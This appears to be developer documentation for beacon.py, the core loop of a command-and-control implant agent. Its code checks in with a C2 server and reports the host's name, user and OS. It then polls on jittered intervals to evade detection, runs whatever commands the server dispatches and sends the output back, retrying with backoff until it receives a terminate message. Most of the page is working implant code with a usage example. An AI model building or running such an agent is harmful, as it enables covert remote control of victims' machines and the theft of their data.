Skip to main content

Overview

The beacon.py module implements the agent’s core communication loop. It handles server check-in, task polling, command execution, and exponential backoff retry logic.

Module Location

agent/beacon.py

Classes

BackoffManager

Manages exponential backoff state for retry logic.

Attributes

_SEQUENCE = [1, 2, 4, 8, 16, 32, 60]  # delay steps in seconds, capped at 60
attempts: int  # Current retry attempt count

Methods

__init__()
Initializes a new BackoffManager with zero attempts.
def __init__(self):
    self.attempts = 0
compute_delay() -> float
Returns the delay for the current attempt, capped at 60 seconds. Returns:
  • float: Delay in seconds
Example:
backoff = BackoffManager()
print(backoff.compute_delay())  # 1.0 (first attempt)

backoff.attempts = 3
print(backoff.compute_delay())  # 8.0 (fourth attempt)

backoff.attempts = 10
print(backoff.compute_delay())  # 60.0 (capped)
reset() -> None
Resets attempt counter after a successful operation.
backoff.reset()
assert backoff.attempts == 0

BeaconLoop

Implements the agent’s main communication loop with the C2 server.

Attributes

_session_id: str | None     # Assigned by server after CHECKIN
_key: bytes                 # Session encryption key
_backoff: BackoffManager    # Retry backoff manager
_profile: TrafficProfile    # Loaded traffic profile
_sleep_fn: Callable         # Jitter strategy function

Methods

__init__()
Initializes the beacon loop with crypto keys and traffic profile.
def __init__(self):
    self._session_id  = None
    self._key         = get_session_key()
    self._backoff     = BackoffManager()
    self._profile     = load_active_profile()
    self._sleep_fn    = get_sleep_fn(self._profile.jitter_strategy)
run() -> None
Runs the full beacon loop — check-in then poll/execute until MSG_TERMINATE. Execution Phases: Phase 1: Initial Check-in
while True:
    try:
        self._checkin()
        self._reset_backoff()
        break
    except TransportError as e:
        logger.warning('checkin failed', extra={'reason': str(e)})
        self._backoff_sleep(reason=str(e))
Retries check-in with exponential backoff until successful. Phase 2: Main Beacon Loop
while True:
    # Compute jittered sleep interval
    sleep_s = self._sleep_fn(config.BEACON_INTERVAL_S, self._profile.jitter_pct)
    
    # Sleep then send TASK_PULL
    time.sleep(sleep_s)
    response = _send(pull_payload, self._key)
    
    # Handle response
    if msg_type == MSG_TASK_DISPATCH:
        self._handle_task_dispatch(response)
    elif msg_type == MSG_TERMINATE:
        sys.exit(0)
Error Handling:
  • TransportError: Triggers exponential backoff, continues loop
  • Other exceptions: Logged, backoff reset, continues loop
_checkin() -> None
Internal method - sends CHECKIN and stores the session_id assigned by server.
Raises:
  • TransportError: If response missing session_id
payload  = _build_checkin_payload()
response = _send(payload, self._key)

self._session_id = (
    response.get('session_id') or
    response.get('payload', {}).get('session_id')
)

if not self._session_id:
    raise TransportError('CHECKIN response missing session_id')
After successful check-in, the logger is updated with the session ID:
logger = update_session(logger, self._session_id)
_handle_task_dispatch(response: dict) -> None
Internal method - executes dispatched task and sends result back to server.
Parameters:
  • response (dict): Server response containing task dispatch
Extracted Fields:
inner     = response.get('payload', {})
task_id   = inner.get('task_id', '')
command   = inner.get('command', '')
args      = inner.get('args', [])
timeout_s = inner.get('timeout_s', 30)
Execution Flow:
result = execute(task_id, command, args, timeout_s)

result_payload = mf.build_task_result(
    session_id  = self._session_id,
    task_id     = result.task_id,
    stdout      = result.stdout,
    stderr      = result.stderr,
    exit_code   = result.exit_code,
    duration_ms = result.duration_ms,
)
_send(result_payload, self._key)
_backoff_sleep(reason: str = '') -> None
Internal method - sleeps for current backoff delay and increments attempt count.
Parameters:
  • reason (str): Optional reason for backoff (for logging)
delay = self._backoff.compute_delay()
logger.warning('backing off before retry', extra={
    'backoff_s':  delay,
    'attempt':    self._backoff.attempts + 1,
    'reason':     reason,
})
time.sleep(delay)
self._backoff.attempts = min(
    self._backoff.attempts + 1,
    len(BackoffManager._SEQUENCE) - 1,
)
_reset_backoff() -> None
Internal method - resets backoff attempt counter after successful operation.
self._backoff.reset()

Helper Functions

_build_checkin_payload() -> dict

Builds CHECKIN payload from current machine info. Returns:
  • dict: CHECKIN message payload
return mf.build_checkin(
    hostname   = platform.node(),
    username   = getpass.getuser(),
    os_info    = f'{platform.system()} {platform.release()} {platform.version()}',
    agent_ver  = AGENT_VERSION,
    jitter_pct = config.JITTER_PCT,
)

_send(payload: dict, key: bytes) -> dict

Packs, sends, and unpacks a beacon message. Parameters:
  • payload (dict): Message payload
  • key (bytes): Encryption key
Returns:
  • dict: Server response payload
packed   = mf.pack(payload, key)
raw_resp = send_beacon(BEACON_ENDPOINT, packed)
return mf.unpack(raw_resp, key)

Constants

BEACON_ENDPOINT = f'https://{config.SERVER_HOST}:{config.SERVER_PORT}/beacon'
AGENT_VERSION   = '1.0.0'

Message Types

The beacon loop handles three message types:
TypeAction
MSG_TASK_DISPATCHExecute task via _handle_task_dispatch()
MSG_TERMINATELog shutdown message and exit with code 0
OtherLog “no task” and continue loop

Backoff Sequence

Retry delays in seconds:
Attempt 1: 1s
Attempt 2: 2s
Attempt 3: 4s
Attempt 4: 8s
Attempt 5: 16s
Attempt 6: 32s
Attempt 7+: 60s (capped)

Usage Example

from agent.beacon import BeaconLoop

# Initialize and run beacon loop
loop = BeaconLoop()
loop.run()  # Runs until MSG_TERMINATE received

Logging

The beacon loop emits structured logs for all operations: Check-in:
logger.info('checkin complete', extra={
    'session_id': self._session_id,
    'hostname':   platform.node(),
})
Beacon sent:
logger.info('beacon sent', extra={
    'session_id':         self._session_id,
    'interval_s':         round(sleep_s, 2),
    'jitter_s':           jitter_s,
    'payload_size_bytes': len(packed),
})
Task executed:
logger.info('task executed', extra={
    'task_id':     task_id,
    'exit_code':   result.exit_code,
    'duration_ms': result.duration_ms,
})
Backoff retry:
logger.warning('backing off before retry', extra={
    'backoff_s':  delay,
    'attempt':    self._backoff.attempts + 1,
    'reason':     reason,
    'session_id': self._session_id,
})

Error Recovery

Transport Errors

Network failures trigger exponential backoff:
except TransportError as e:
    logger.warning('transport error', extra={
        'reason':     str(e),
        'session_id': self._session_id,
    })
    self._backoff_sleep(reason=str(e))

Unexpected Errors

Other exceptions are logged but don’t stop the loop:
except Exception as e:
    logger.error('unexpected error in beacon loop', extra={
        'reason':     str(e),
        'traceback':  traceback.format_exc(),
        'session_id': self._session_id,
    })
    self._reset_backoff()

Security Features

  1. End-to-End Encryption: All messages encrypted with _key
  2. Session Isolation: Each agent gets unique session_id
  3. Graceful Shutdown: MSG_TERMINATE cleanly exits the loop
  4. Error Recovery: Network failures don’t crash the agent

Build docs developers (and LLMs) love